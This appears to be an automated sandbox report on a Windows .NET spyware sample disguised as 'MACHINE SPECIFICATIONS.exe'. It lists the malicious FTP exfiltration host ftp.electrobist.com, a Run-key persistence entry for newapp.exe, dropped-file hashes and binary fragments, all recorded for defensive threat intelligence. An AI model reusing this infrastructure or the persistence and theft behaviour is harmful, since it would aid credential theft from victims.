Source	Detection	Scanner	Label	Link	Download
10.0.CasPol.exe.400000.0.unpack	100%	Avira	TR/Spy.Gen8		Download File

Domains

Source	Detection	Scanner	Link
api.ipify.org.herokudns.com	0%	Virustotal	Browse
c-0001.c-msedge.net	0%	Virustotal	Browse
ftp.electrobist.com	1%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www	0%	URL Reputation	safe
http://DynDns.comDynDNSnamejidpasswordPsi/Psi	0%	URL Reputation	safe
http://127.0.0.1:HTTP/1.1	0%	Avira URL Cloud	safe
https://api.ipify.orgftp://ftp.electrobist.comuser1	0%	Avira URL Cloud	safe
https://eyUBHCqVhczCNfHAY6U.org	0%	Avira URL Cloud	safe
http://ftp.electrobist.com	100%	Avira URL Cloud	malware
http://xgrPBN.com	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
api.ipify.org.herokudns.com	3.220.57.224	true	false	0%, Virustotal, Browse	unknown
c-0001.c-msedge.net	13.107.4.50	true	false	0%, Virustotal, Browse	unknown
ftp.electrobist.com	51.195.62.160	true	true	1%, Virustotal, Browse	unknown
api.ipify.org	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.ipify.org/	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://127.0.0.1:HTTP/1.1	CasPol.exe, 0000000A.00000002.767841057.0000000002881000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://api.ipify.org	CasPol.exe, 0000000A.00000002.767841057.0000000002881000.00000004.00000800.00020000.00000000.sdmp	false		high
https://eyUBHCqVhczCNfHAY6U.org	CasPol.exe, 0000000A.00000002.768390327.00000000028D4000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000A.00000002.772635350.0000000002B66000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://xgrPBN.com	CasPol.exe, 0000000A.00000002.767841057.0000000002881000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ftp.electrobist.com	CasPol.exe, 0000000A.00000002.772635350.0000000002B66000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000A.00000002.772655142.0000000002B6A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	CasPol.exe, 0000000A.00000002.767841057.0000000002881000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.ipify.orgftp://ftp.electrobist.comuser1	CasPol.exe, 0000000A.00000002.767841057.0000000002881000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www	CasPol.exe, 0000000A.00000002.767841057.0000000002881000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://DynDns.comDynDNSnamejidpasswordPsi/Psi	CasPol.exe, 0000000A.00000002.767841057.0000000002881000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
51.195.62.160	ftp.electrobist.com	France		16276	OVHFR	true
3.220.57.224	api.ipify.org.herokudns.com	United States		14618	AMAZON-AESUS	false

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	755960
Start date and time:	2022-11-29 11:18:06 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 46s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	MACHINE SPECIFICATIONS.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	20
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/5@3/3
EGA Information:	Successful, ratio: 33.3%
HDC Information:	Failed
HCA Information:	Successful, ratio: 99% Number of executed functions: 107 Number of non-executed functions: 6
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240s for sample files taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 67.27.158.254, 8.248.135.254, 8.241.123.126, 8.248.143.254, 67.27.157.254
Excluded domains from analysis (whitelisted): fg.download.windowsupdate.com.c.footprint.net, fs.microsoft.com, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net
Execution Graph export aborted for target newapp.exe, PID 4272 because it is empty
Execution Graph export aborted for target newapp.exe, PID 676 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
11:19:57	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run newapp C:\Users\user\AppData\Roaming\newapp\newapp.exe
11:20:05	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run newapp C:\Users\user\AppData\Roaming\newapp\newapp.exe
11:20:12	API Interceptor	1137x Sleep call for process: CasPol.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
51.195.62.160	vbc.exe	Get hash	malicious	Browse	www.strongdigits.com/n8it/?hXkTC=9rmD_BYXon&O48HJZ7=8T2Uslqj793E8Rx0A6tAbHvegSoBRNrTkrL5sa6LhEisP65VVN1ZTCOFs+PiSTeKib/u
3.220.57.224	swYA5v1F5o.exe	Get hash	malicious	Browse	api.ipify.org/
	SecuriteInfo.com.Win32.PWSX-gen.8053.6874.exe	Get hash	malicious	Browse	api.ipify.org/
	xDUOL3tAR4.exe	Get hash	malicious	Browse	api.ipify.org/?format=txt
	CnkGKVQ63n.exe	Get hash	malicious	Browse	api.ipify.org/?format=txt
	masslogger.bin.exe	Get hash	malicious	Browse	api.ipify.org/
	SecuriteInfo.com.Trojan.PWS.Siggen3.24449.27201.30669.exe	Get hash	malicious	Browse	api.ipify.org/
	iirWPHKXWA.exe	Get hash	malicious	Browse	api.ipify.org/
	iirWPHKXWA.exe	Get hash	malicious	Browse	api.ipify.org/
	library_1.exe	Get hash	malicious	Browse	api.ipify.org/?format=xml
	MPW3FZULO3.exe	Get hash	malicious	Browse	api.ipify.org/?format=xml
	#U00d6deme kopyas#U0131.exe	Get hash	malicious	Browse	api.ipify.org/
	na.exe	Get hash	malicious	Browse	api.ipify.org/
	IMG0001909022.vbs	Get hash	malicious	Browse	api.ipify.org/
	SecuriteInfo.com.W32.Trojan.FSDO-8208.24884.exe	Get hash	malicious	Browse	api.ipify.org/
	Qivwb1V6g1.exe	Get hash	malicious	Browse	api.ipify.org/
	UC8CT2nqw6.exe	Get hash	malicious	Browse	api.ipify.org/
	ConsoleApp8.exe	Get hash	malicious	Browse	api.ipify.org/
	SecuriteInfo.com.Trojan.GenericKD.50428043.31193.exe	Get hash	malicious	Browse	api.ipify.org/
	helf.hpl.dll	Get hash	malicious	Browse	api.ipify.org/
	Z27PH1HZ6U.doc	Get hash	malicious	Browse	api.ipify.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
api.ipify.org.herokudns.com	SecuriteInfo.com.Win32.CrypterX-gen.24912.15475.exe	Get hash	malicious	Browse	54.91.59.199
	MEPS-42.exe	Get hash	malicious	Browse	3.232.242.170
	ORDER.exe	Get hash	malicious	Browse	52.20.78.240
	SecuriteInfo.com.Win32.CrypterX-gen.414.24926.exe	Get hash	malicious	Browse	52.20.78.240
	DHJ59300948.xls	Get hash	malicious	Browse	3.232.242.170
	Quotation.exe	Get hash	malicious	Browse	54.91.59.199
	Cg7vRuVKhI.exe	Get hash	malicious	Browse	3.232.242.170
	SecuriteInfo.com.Win32.CrypterX-gen.12789.377.exe	Get hash	malicious	Browse	3.232.242.170
	Wzf4gWTOC2.exe	Get hash	malicious	Browse	3.220.57.224
	SecuriteInfo.com.W32.MSIL_Kryptik.ILD.gen.Eldorado.12870.1146.exe	Get hash	malicious	Browse	54.91.59.199
	SecuriteInfo.com.Win32.PWSX-gen.7585.24753.exe	Get hash	malicious	Browse	3.232.242.170
	SecuriteInfo.com.Win32.PWSX-gen.25304.17510.exe	Get hash	malicious	Browse	52.20.78.240
	SecuriteInfo.com.BackDoor.SpyBotNET.25.24486.13932.exe	Get hash	malicious	Browse	54.91.59.199
	buH9VrC1dQ.exe	Get hash	malicious	Browse	54.91.59.199
	PO-08784 xlsx.vbe	Get hash	malicious	Browse	54.91.59.199
	KWIR000714988.exe	Get hash	malicious	Browse	54.91.59.199
	Attach Qoute.exe	Get hash	malicious	Browse	54.91.59.199
	SWIFT Payment W076001.exe	Get hash	malicious	Browse	52.20.78.240
	file.exe	Get hash	malicious	Browse	3.220.57.224
	Ordine n.47201 pdf.vbs	Get hash	malicious	Browse	52.20.78.240
c-0001.c-msedge.net	Iwutiwno.dll.dll	Get hash	malicious	Browse	13.107.4.50
	kW1RcHd3Np.exe	Get hash	malicious	Browse	13.107.4.50
	Urgent quote request -pdf-.exe	Get hash	malicious	Browse	13.107.4.50
	094089010-094098574-1669343495-1669343493-2332.html	Get hash	malicious	Browse	13.107.4.50
	LhLntDLA0i.exe	Get hash	malicious	Browse	13.107.4.50
	stGLUBW7kG.exe	Get hash	malicious	Browse	13.107.4.50
	file.exe	Get hash	malicious	Browse	13.107.4.50
	I8Kmld8K8U.exe	Get hash	malicious	Browse	13.107.4.50
	CamScanner-397841.exe	Get hash	malicious	Browse	13.107.4.50
	UPDATED SOA (2).exe	Get hash	malicious	Browse	13.107.4.50
	2022#U5e74#U4e2a#U4eba#U52b3#U52a8#U8865#U8d34.docx.doc	Get hash	malicious	Browse	13.107.4.50
	REMITTANCE COPY.exe	Get hash	malicious	Browse	13.107.4.50
	TNT Invoice_pdf.exe	Get hash	malicious	Browse	13.107.4.50
	n2cFuTcuzL.exe	Get hash	malicious	Browse	13.107.4.50
	file.exe	Get hash	malicious	Browse	13.107.4.50
	SecuriteInfo.com.Trojan.PackedNET.1617.17943.11881.exe	Get hash	malicious	Browse	13.107.4.50
	SecuriteInfo.com.W32.A-62389890.Eldorado.4706.2477.exe	Get hash	malicious	Browse	13.107.4.50
	file.exe	Get hash	malicious	Browse	13.107.4.50
	PO-SKT112322011.xls	Get hash	malicious	Browse	13.107.4.50
	invoice.exe	Get hash	malicious	Browse	13.107.4.50

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
AMAZON-AESUS	SecuriteInfo.com.Win32.CrypterX-gen.24912.15475.exe	Get hash	malicious	Browse	54.91.59.199
	MEPS-42.exe	Get hash	malicious	Browse	3.220.57.224
	ORDER.exe	Get hash	malicious	Browse	52.20.78.240
	SecuriteInfo.com.Win32.CrypterX-gen.414.24926.exe	Get hash	malicious	Browse	52.20.78.240
	DHJ59300948.xls	Get hash	malicious	Browse	3.232.242.170
	Quotation.exe	Get hash	malicious	Browse	3.220.57.224
	Cg7vRuVKhI.exe	Get hash	malicious	Browse	3.232.242.170
	SecuriteInfo.com.Win32.CrypterX-gen.12789.377.exe	Get hash	malicious	Browse	3.232.242.170
	Wzf4gWTOC2.exe	Get hash	malicious	Browse	3.220.57.224
	SecuriteInfo.com.W32.MSIL_Kryptik.ILD.gen.Eldorado.12870.1146.exe	Get hash	malicious	Browse	54.91.59.199
	SecuriteInfo.com.Win32.PWSX-gen.7585.24753.exe	Get hash	malicious	Browse	3.232.242.170
	SecuriteInfo.com.Win32.PWSX-gen.25304.17510.exe	Get hash	malicious	Browse	52.20.78.240
	https://ipfs.io/ipfs/QmZscYPiZiEyUufsiTp73rjGySUVKx6mbYrEnns9n7DNVh?filename=ownredirectautoweb.html#news@pitchfork.com	Get hash	malicious	Browse	34.233.165.88
	https://app.smartsheet.com/b/download/att/1/7953430800033668/2d1kcfy3a3mgsxdrbomrc9v3jo	Get hash	malicious	Browse	34.239.40.100
	https://linktfetn.cc	Get hash	malicious	Browse	52.86.202.16
	http://url4483.sosadiazeventos.com/ls/click?upn=mXPGTXlLlQcgRVh-2F4Dp38fDRGJMmpWDEH-2FE76VgzzHi8nDM-2FDFm088Y0fZh2YEo3911s_enYX4alLiJIZDBGIDabCChe307NCTtptA6FkWYSB3j5V6OhBzgfspKVbV4JVvzGdBg-2FpfIDbModFw6pwZbxUwOIH920HTdp04aJvbH-2BiE9HXzSLKkYY-2BQwN2k3tfS1dLZiMlWWHBIONkLNSv-2FImW2JVPUHpzjWGgnR15xLUdZiK3LrL1QwISGwkykQ0r7Gx9gXXzyzrOEbYDB0YUT3HYJ9KcMPT87DhnXEWe46sjqEA-3D	Get hash	malicious	Browse	34.226.96.6
	https://firerite1-my.sharepoint.com/:o:/g/personal/luke_firerite_co_uk/EgX55biPFdZEjA-OHgYPtTQBt8i3-MO-Jg7Sa3pYTRp-_Q?e=5%3aStgzAn&at=9	Get hash	malicious	Browse	54.85.178.36
	http://www.fpat.info	Get hash	malicious	Browse	52.201.0.9
	SecuriteInfo.com.BackDoor.SpyBotNET.25.24486.13932.exe	Get hash	malicious	Browse	52.20.78.240
	buH9VrC1dQ.exe	Get hash	malicious	Browse	52.20.78.240
OVHFR	DHJ59300948.xls	Get hash	malicious	Browse	188.165.213.20
	Wzf4gWTOC2.exe	Get hash	malicious	Browse	188.165.213.20
	35JTigDQD0.elf	Get hash	malicious	Browse	149.56.12.10
	https://ipfs.io/ipfs/QmZscYPiZiEyUufsiTp73rjGySUVKx6mbYrEnns9n7DNVh?filename=ownredirectautoweb.html#news@pitchfork.com	Get hash	malicious	Browse	51.89.9.254
	https://paper.li/lnMHi8ZFENoxtKejQDZMh/story/document-confidential-m8ZkThqLiTXweW3JUxcg2	Get hash	malicious	Browse	37.187.86.201
	8kH56VSq58.elf	Get hash	malicious	Browse	192.99.71.226
	file.exe	Get hash	malicious	Browse	5.135.247.111
	BL-NO-OOLU2136901180.vbs	Get hash	malicious	Browse	213.186.33.5
	Services_Jingce_Quotation28112022.exe	Get hash	malicious	Browse	149.56.23.213
	file.exe	Get hash	malicious	Browse	5.135.247.111
	justificante de transferencia.vbe	Get hash	malicious	Browse	164.132.238.203
	file.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	139.99.27.222
	Facture.html	Get hash	malicious	Browse	51.81.165.16
	https://sdsando.com/0o0o/?bGVvLmRlZXBhbkB1cy5ndC5jb20	Get hash	malicious	Browse	51.79.197.167
	file.exe	Get hash	malicious	Browse	5.135.247.111
	Quote.js	Get hash	malicious	Browse	51.79.9.164

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	SecuriteInfo.com.Win32.CrypterX-gen.24912.15475.exe	Get hash	malicious	Browse	3.220.57.224
	MEPS-42.exe	Get hash	malicious	Browse	3.220.57.224
	11-29-22.exe	Get hash	malicious	Browse	3.220.57.224
	ORDER.exe	Get hash	malicious	Browse	3.220.57.224
	SecuriteInfo.com.Win32.CrypterX-gen.414.24926.exe	Get hash	malicious	Browse	3.220.57.224
	Quotation.exe	Get hash	malicious	Browse	3.220.57.224
	Ziraat-bankasiSwiftMessaji2911202245344.exe	Get hash	malicious	Browse	3.220.57.224
	Cg7vRuVKhI.exe	Get hash	malicious	Browse	3.220.57.224
	SecuriteInfo.com.Win32.PWSX-gen.7918.18477.exe	Get hash	malicious	Browse	3.220.57.224
	SecuriteInfo.com.Win32.CrypterX-gen.12789.377.exe	Get hash	malicious	Browse	3.220.57.224
	Wzf4gWTOC2.exe	Get hash	malicious	Browse	3.220.57.224
	AWB DHL 7214306201 Shipment.pdf (432).exe	Get hash	malicious	Browse	3.220.57.224
	WxuqCcSnq2.exe	Get hash	malicious	Browse	3.220.57.224
	SecuriteInfo.com.W32.MSIL_Kryptik.ILD.gen.Eldorado.12870.1146.exe	Get hash	malicious	Browse	3.220.57.224
	SecuriteInfo.com.Win32.PWSX-gen.7585.24753.exe	Get hash	malicious	Browse	3.220.57.224
	zoomx64.exe	Get hash	malicious	Browse	3.220.57.224
	zoomx64.exe	Get hash	malicious	Browse	3.220.57.224
	SecuriteInfo.com.Win32.PWSX-gen.25304.17510.exe	Get hash	malicious	Browse	3.220.57.224
	k5cfjUZeT2.exe	Get hash	malicious	Browse	3.220.57.224
	SkyNet.1448.exe	Get hash	malicious	Browse	3.220.57.224

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Roaming\newapp\newapp.exe	SecuriteInfo.com.W64.Agent.FIC.gen.Eldorado.1956.16034.exe	Get hash	malicious	Browse
	SecuriteInfo.com.W64.Agent.FIC.gen.Eldorado.14198.17336.exe	Get hash	malicious	Browse
	SecuriteInfo.com.MSIL.GenKryptik.GCPV.tr.20538.12237.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.PackedNET.1680.17253.14925.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Win64.CrypterX-gen.23326.16714.exe	Get hash	malicious	Browse
	QUOTATION.exe	Get hash	malicious	Browse
	RFQ11202022-SOEC.exe	Get hash	malicious	Browse
	RFQ11192022-SOEC.exe	Get hash	malicious	Browse
	bSPRpBND9K.exe	Get hash	malicious	Browse
	H691qJujAI.exe	Get hash	malicious	Browse
	19723088.exe	Get hash	malicious	Browse
	x9Q9JmaeUH.exe	Get hash	malicious	Browse
	RFQ11142.EXE.exe	Get hash	malicious	Browse
	QUOTATION.exe	Get hash	malicious	Browse
	RFQ11132022-SOEC.exe	Get hash	malicious	Browse
	QUOTATION.exe	Get hash	malicious	Browse
	QUOTATION.exe	Get hash	malicious	Browse
	5f88991.exe	Get hash	malicious	Browse
	SPECIFICATIONS.exe	Get hash	malicious	Browse
	SPECIFICATIONS.IMG	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\MACHINE SPECIFICATIONS.exe.log

Download File

Process:	C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	654
Entropy (8bit):	5.374391981354885
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPTxAIOKbbDLI4MWuPOKN08JOKhap+92n4MNQpN9tv:ML9E4KrgKDE4KGKN08AKh6+84xpNT
MD5:	C8A62E39DE7A3F805D39384E8BABB1E0
SHA1:	B32B1257401F17A2D1D5D3CC1D8C1E072E3FEE31
SHA-256:	A7BC127854C5327ABD50C86000BF10586B556A5E085BB23523B07A15DD4C5383
SHA-512:	7DB2825131F5CDA6AF33A179D9F7CD0A206FF34AE50D6E66DE9E99BE2CD1CB985B88C00F0EDE72BBC4467E7E42B5DC6132403AA2EC1A0A7A6D11766C438B10C3
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\f2e0589ed6d670f264a5f65dd0ad000f\Microsoft.VisualBasic.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\newapp.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\newapp\newapp.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	42
Entropy (8bit):	4.0050635535766075
Encrypted:	false
SSDEEP:	3:QHXMKa/xwwUy:Q3La/xwQ
MD5:	84CFDB4B995B1DBF543B26B86C863ADC
SHA1:	D2F47764908BF30036CF8248B9FF5541E2711FA2
SHA-256:	D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
SHA-512:	485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..

C:\Users\user\AppData\Roaming\newapp\newapp.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	107624
Entropy (8bit):	5.882571203162287
Encrypted:	false
SSDEEP:	1536:oSF7vA1hRqHixxMjlI34j8p2mdc/6A4vW/CU1RPMRVQJE:/A1hDPMip2mdcyA4vW/JRPMLQW
MD5:	F866FC1C2E928779C7119353C3091F0C
SHA1:	70D06064E2F12CFB10A82BC985F86F58EA7A4138
SHA-256:	67F3FC243C58EEAE55BDDC22CE025B7841A89ACA2E201B999D8C0E4F07D177B8
SHA-512:	B28B10801580726B85AB5F796EA26835648A3ACFBE1FBA95DFC687439B43FF9548BD3AB9EFC85D88FC071D232718BCFFAC614CC5BFF159173996A3D2AB22154D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: SecuriteInfo.com.W64.Agent.FIC.gen.Eldorado.1956.16034.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.W64.Agent.FIC.gen.Eldorado.14198.17336.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.MSIL.GenKryptik.GCPV.tr.20538.12237.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Trojan.PackedNET.1680.17253.14925.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win64.CrypterX-gen.23326.16714.exe, Detection: malicious, Browse Filename: QUOTATION.exe, Detection: malicious, Browse Filename: RFQ11202022-SOEC.exe, Detection: malicious, Browse Filename: RFQ11192022-SOEC.exe, Detection: malicious, Browse Filename: bSPRpBND9K.exe, Detection: malicious, Browse Filename: H691qJujAI.exe, Detection: malicious, Browse Filename: 19723088.exe, Detection: malicious, Browse Filename: x9Q9JmaeUH.exe, Detection: malicious, Browse Filename: RFQ11142.EXE.exe, Detection: malicious, Browse Filename: QUOTATION.exe, Detection: malicious, Browse Filename: RFQ11132022-SOEC.exe, Detection: malicious, Browse Filename: QUOTATION.exe, Detection: malicious, Browse Filename: QUOTATION.exe, Detection: malicious, Browse Filename: 5f88991.exe, Detection: malicious, Browse Filename: SPECIFICATIONS.exe, Detection: malicious, Browse Filename: SPECIFICATIONS.IMG, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...rX.Z..............0..X...........v... ........@.. ..............................Q.....`.................................<v..O.......$............f..h>...........u............................................... ............... ..H............text....V... ...X.................. ..`.rsrc...$............Z..............@..@.reloc...............d..............@..B................pv......H.......,...`...............xE...t......................................2~P....o.....r...p(....VrK..p(....s.....P...*..0.._.......~....:O....>.....%.rm..p...A...s......su....%.r...p...A...s....rm..p.su....%.r...p...B...s......su....%.r...p...B...s....r...p.su....%.r...p...C...s......su....%.r...p...C...s....r...p.su....%.r...p...D...s......su....%.r...p...D...s....r...p.su....%.r...p...E...s......su....%..r...p...E...s....r...p.su....%..r...p...F...s......su....%..r...p...F

\Device\ConDrv

Download File

Process:	C:\Users\user\AppData\Roaming\newapp\newapp.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	486
Entropy (8bit):	5.064987733454706
Encrypted:	false
SSDEEP:	12:z30U30b4BFNY8fNFquci7S1pE+DPOCN6+QOH5JyY:z3F3g4DO4UE+Tz5JB
MD5:	30394F72BB157162F35A2DEB1F48BD1A
SHA1:	66AD7D748F42C64E0698606A8F019D165DE657E8
SHA-256:	133FABF0CD558FA3E5144E9EF35654FA0422F8424C6D5D82828B8D10EC9BA295
SHA-512:	A93E12D6C9927403FE0E20B8A698B24007EBCCD53A29AD65428366C6CE3CED05E5F3AEFF1D46C7D9F174EAEAE5059F0B5D12353B6022965CDC5D187E45FA72E9
Malicious:	false
Preview:	Microsoft .NET Framework CasPol 4.7.3056.0..for Microsoft .NET Framework version 4.7.3056.0..Copyright (C) Microsoft Corporation. All rights reserved.....WARNING: The .NET Framework does not apply CAS policy by default. Any settings shown or modified by CasPol will only ..affect applications that opt into using CAS policy. ....Please see http://go.microsoft.com/fwlink/?LinkId=131738 for more information. ......ERROR: Not enough arguments....For usage information, use 'caspol -?'..

Static File Info

General

File type:	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.979738488629949
TrID:	Win64 Executable GUI (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	MACHINE SPECIFICATIONS.exe
File size:	523776
MD5:	92945d0a2731ef771ea9d10c792e03e1
SHA1:	1eeef600b7b51ce7aa93e825be55b40f3ef8e319
SHA256:	46b61250c34b38d26ac5897217e6b70a222ff16318161c4e67c74c74491cc612
SHA512:	33ff6835de8b3a4a0002669deb68acf14a770e7546c2250eb6cdcde2ad4841891f504faa77427e864d1b7758481864189039beb8ec9d926f5804bd7da30a5fb2
SSDEEP:	12288:BxNQOgJk4hl4vPE1suvqvku873X9BsILNILZoRPzre:BxNi6MlzX9BsILNILZoFre
TLSH:	F7B4235560BB2097E21682344A275FA211E4AE2325E6BD4FE3DCBD0F5F732402E39766
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...$..c.........."...0......B........... ....@...... .......................@............`................................

File Icon


Icon Hash:	c49a0894909c6494

Static PE Info

General

Entrypoint:	0x400000
Entrypoint Section:
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x63800824 [Fri Nov 25 00:11:16 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:

Entrypoint Preview

Instruction
dec ebp
pop edx
nop
add byte ptr [ebx], al
add byte ptr [eax], al
add byte ptr [eax+eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x7e000	0x40a0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x7d864	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2000	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x7b8d3	0x7ba00	False	0.9942492416582407	data	7.996815914318105	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x7e000	0x40a0	0x4200	False	0.4485677083333333	data	5.797210494950491	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_ICON	0x7e190	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024
RT_ICON	0x7e5f8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096
